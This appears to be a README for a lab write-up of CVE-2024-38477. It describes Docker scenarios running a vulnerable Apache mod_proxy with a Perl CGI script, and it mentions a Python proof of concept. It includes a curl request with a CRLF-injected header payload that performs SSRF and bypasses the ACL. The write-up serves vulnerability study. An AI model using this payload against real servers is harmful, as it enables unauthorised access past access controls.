# Introduction

This project provides a write-up of **CVE-2024-38477**. To avoid crashing a production environment, the project contains two scenarios running a vulnerable Apache2 mod_proxy. These scenarios can be deployed with Docker. The project also contains a **Proof of Concept**: a Python script that executes the attack against the server.

## Scenarios

### Scenario 1

The first scenario is a Perl script that can be executed with Apache's CGI module. For testing, I created a Perl script that lists all directories and files in the path specified as an argument.

The scenario can be deployed with Docker:

```
$ docker build -t cve-cgi scenario1/
$ docker run -p 8080:80 cve-cgi
```

With a simple curl request, you can perform an SSRF attack against the Apache server and bypass the ACL:

```
$ curl "http://localhost:8080/cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a"